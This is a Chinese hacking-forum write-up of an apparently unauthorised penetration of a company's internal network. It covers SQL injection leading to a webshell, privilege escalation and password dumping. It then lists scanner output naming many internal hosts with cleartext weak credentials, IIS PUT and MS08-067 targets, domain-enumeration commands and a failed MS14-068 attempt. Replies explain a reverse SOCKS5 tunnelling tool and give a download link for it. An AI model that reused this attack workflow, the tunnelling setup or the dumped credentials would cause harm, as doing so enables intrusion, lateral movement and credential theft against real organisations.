某内网渗透实例

某内网渗透实例

1.外网入口:

目标:vlun.com[打码需要]

从m.vlun.com分站入手,发现有一个注入

clip_image001

直接备份一个webshell

clip_image003

clip_image004

接着提权加抓密码的得到:

UserName: Administrator

password: vlun,123【之前的密码,也被抓下来了】

UserName: Administrator

password: vlun,54a【可以发现这个密码和ip有关!】

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

2.内网渗透:

2.1. 10.135.106.0/24段

本机在这个段,而且之前密码来看,密码和ip有关,

也就是说假设ip是10.135.106.108,那他的口令一个这样administrator:vlun,108a

So,密码将字典加入凤凰扫描器,开始扫描;

Result:

Mysql:

10.135.106.25 mysql at 3306 has weaken password!!-------root:123456

10.135.106.86 mysql at 3306 has weaken password!!-------root:root

Ssh:

10.135.106.245 ssh at 22 has weaken password!!-------root:vlun,123

Smb:

10.135.106.75 smb at 445 has weaken password!!-------administrator:vlun,123

10.135.106.160 smb at 445 has weaken password!!-------administrator:vlun,123

10.135.106.54 smb at 445 has weaken password!!-------administrator:vlun,54a

10.135.106.41 smb at 445 has weaken password!!-------administrator:vlun,41a

10.135.106.180 smb at 445 has weaken password!!-------administrator:vlun,180a

喜欢sock5代理,可以方便的用proxychains和proxifier连接。

想用hdtran做一个sockets代理,结果老给杀掉,直接用python写一个类似功能的,ssock_win.exe 做了sock5代理并反弹出来~

上图:

clip_image006

clip_image008

clip_image010

该段是工作组环境,没继续玩,准备漫游其他的ip段

-------------------------------------------------------------------------

2.2. 10.135.7.0/24 10.135.8.0/24

继续上扫描器:

Result:

Web:

10.135.7.113 tomcat service at 8080 has weaken password!!-------tomcat:tomcat

10.135.8.20 has iis_put vlun at 80

10.135.8.188 tomcat service at 8080 has weaken password!!-------tomcat:tomcat

拿下10.135.7.113 和 10.135.8.188 tomcat,部署shell

clip_image012

发现 7,8段有域环境,但是本机连接不上10.135.7.113的3389. 应该是做了访问的限制

----

继续看10.135.8.20 有iisput 写漏洞,写上一个shell~

clip_image013

发现10.135.8.20的3389是开启的

直接提权,抓密码

Administrator:Pa$$w0rd

进远程桌面

clip_image015

看到一个xshell,里面全是正在连接的ssh

clip_image017

搞到不少linux的ssh。

有了10.135.8.20这个机子,我们的访问就再也没有限制了~

2.3.拿域控失败

10.135.6.0/24 10.135.7.0/24 10.135.8.0/24 10.135.12.0/24

是在域的环境下的,如何拿域控?现在的思路:

1.继续扫描口令,抓密码,看看能不能找到域控密码

2.测试ms14-068 看看能不能成功

1.继续扫描口令,结果:

Mysql:

10.135.6.241 mysql at 3306 has weaken password!!-------root:vlun,123

10.135.6.240 mysql at 3306 has weaken password!!-------root:vlun,123

10.135.12.206 mysql at 3306 has weaken password!!-------root:1

10.135.12.112 mysql at 3306 has weaken password!!-------root:123456

10.135.12.163 mysql at 3306 has weaken password!!-------root:root

10.135.12.223 mysql at 3306 has weaken password!!-------root:root

mssql:

10.135.4.65 mssql at 1433 has weaken password!!-------sa:vlun

10.135.6.49 mssql at 1433 has weaken password!!-------sa:sa

10.135.6.9 mssql at 1433 has weaken password!!-------sa:vlun

10.135.6.166 mssql at 1433 has weaken password!!-------sa:vlun

10.135.6.146 mssql at 1433 has weaken password!!-------sa:123456

10.135.7.135 mssql at 1433 has weaken password!!-------sa:sa

10.135.12.86 mysql at 3306 has weaken password!!-------root:root

10.135.12.98 mssql at 1433 has weaken password!!-------sa:sa

10.135.7.135 sa是system权限的,给他加上一个管理员,登入3389。

抓密码,找到一个域用户的密码,可惜不是域控,但是权限挺大,可以登入7段的大多数机子的3389:

UserName: tiancongliu

password: %TGB5tgb

简单的收集一下域环境的信息:

查询域管理员用户组:

net group "domain admins" /domain

组名 Domain Admins

注释 Designated administrators of the domain

成员

-------------------------------------------------------------------------------

Administrator ericzhang hongxiangli

...................

命令成功完成。

dsquery computer ----- 找域控

[发现10.135.8.110是域控]

Smb:

10.135.7.83 smb at 445 has weaken password!!-------administrator:Pa$$w0rd

10.135.7.201 smb at 445 has weaken password!!-------administrator:Nji9bhu8

10.135.7.119 smb at 445 has weaken password!!-------administrator:Nji9bhu8

10.135.7.176 smb at 445 has weaken password!!-------administrator:Nji9bhu8

10.135.7.180 smb at 445 has weaken password!!-------administrator:Nji9bhu8

10.135.7.210 smb at 445 has weaken password!!-------administrator:Nji9bhu8

10.135.7.139 smb at 445 has weaken password!!-------administrator:Nji9bhu8

10.135.7.135 smb at 445 has weaken password!!-------administrator:Nji9bhu8

10.135.7.211 smb at 445 has weaken password!!-------administrator:Nji9bhu8

10.135.7.29 smb at 445 has weaken password!!-------administrator:Vlun,123

10.135.7.23 smb at 445 has weaken password!!-------administrator:password

10.135.8.188 smb at 445 has weaken password!!-------administrator:Vlun

10.135.8.234 smb at 445 has weaken password!!-------administrator:Nji9bhu8

10.135.8.154 has ms_08_067 VULNERABLE

10.135.8.72 has ms_08_067 VULNERABLE

10.135.8.251 has ms_08_067 VULNERABLE

再这些服务器上抓密码....居然都没有发现域控的密码......伤心

【tip:一台一台登,如何抓密码有点麻烦,可以用Netsess.exe -h dcip来找找,哪些服务器给域控登入过了;我测试时失败了,但是有大牛测试时成功的,具体可以看这里:

https://blog.netspi.com/5-ways-to-find-systems-running-domain-admin-processes/】

2.测试ms14-068 失败

测试刚刚出现的ms14-068

clip_image019

导入凭证

clip_image021

查看是否导入凭证

clip_image023

失败......

clip_image025

没有搞定域控,有些忧伤

2.4.其他

顺手扫了一下其他段。

result:

mysql:

10.135.2.126 mysql at 3306 has weaken password!!-------root:root

10.135.2.117 mysql at 3306 has weaken password!!-------root:root

10.135.4.65 mysql at 3306 has weaken password!!-------root:root

Mail,服务器在192.168.100.116【玩不动了】

mssql:

10.135.4.65 mssql at 1433 has weaken password!!-------sa:vlun

192.168.100.215 mssql at 1433 has weaken password!!-------sa:sa

192.168.100.192 mssql at 1433 has weaken password!!-------sa:vlun

Smb:

192.168.100.214 smb at 445 has weaken password!!-------administrator:Nji9bhu8

192.168.100.129 smb at 445 has weaken password!!-------administrator:vlun,123

192.168.100.230 smb at 445 has weaken password!!-------administrator:vlun,123

192.168.100.56 smb at 445 has weaken password!!-------administrator:vlun,123

192.168.100.125 smb at 445 has weaken password!!-------administrator:vlun,123

192.168.100.237 smb at 445 has weaken password!!-------administrator:vlun,123

192.168.100.245 smb at 445 has weaken password!!-------administrator:vlun

192.168.100.100 smb at 445 has weaken password!!-------vlunadmin:vlun

192.168.100.97 smb at 445 has weaken password!!-------vlunadmin:vlun,123

web:

10.135.7.113 tomcat service at 8080 has weaken password!!-------tomcat:tomcat

10.135.8.188 tomcat service at 8080 has weaken password!!-------tomcat:tomcat

10.135.1.24 has iis_put vlun at 80

10.135.1.101 tomcat service at 8080 has weaken password!!-------tomcat:tomcat

redis:

10.135.106.57 redis service at 6379 allow login Anonymous login!!

10.135.106.210 redis service at 6379 allow login Anonymous login!!

10.135.2.231 redis service at 6379 allow login Anonymous login!!

10.135.6.30 redis service at 6379 allow login Anonymous login!!

10.135.6.77 redis service at 6379 allow login Anonymous login!!

10.135.6.234 redis service at 6379 allow login Anonymous login!!

10.135.7.235 redis service at 6379 allow login Anonymous login!!

10.135.12.195 redis service at 6379 allow login Anonymous login!!

10.135.12.205 redis service at 6379 allow login Anonymous login!!

10.135.12.206 redis service at 6379 allow login Anonymous login!!

==================================

精彩 !!!也许可以用 msf credential collector 模块收集下hashes及tockens ,运气也有可能会碰见域控

==================================

经鉴定为凤凰扫描器软文

不过确实很给力

ssock_win.exe 这个可以共享下吗?普通权限下能开代理转发出来吧?》

usage: ssock_win.exe [-h] --lport LPORT --rhost RHOST --rport RPORT

just like ssock

optional arguments:

-h, --help show this help message and exit

--lport LPORT build socket5 in this port

--rhost RHOST connect this ip

--rport RPORT connect this port

--lport是本地开启socks5的端口

--rhost是有外网ip的服务器的地址

--rport是外网ip的服务器的端口

外网服务器可以用lcx -listen port1 port2 来接受,也可以用rtcp.py来监听。他们是一样

examp:

外网服务器:

lcx -listen port1 port2

内网服务器

ssock_win.exe --lport 10100 --rhost IP --rport port1

文件看这里:

链接:http://pan.baidu.com/s/1qWLqC24 密码:jyur

1.路径带中文会报错的

2.因为是pyinstaller生成,文件都比较大

3.ssock_win.exe 发包不能太频繁,但是3389还是连的起来的~ 出错以后要重新运行

------------------------------------------------------------------------------------------------------------------------------

只要network权限加执行命令权限就可以了

 

via https://forum.90sec.org/forum.php?mod=viewthread&tid=8483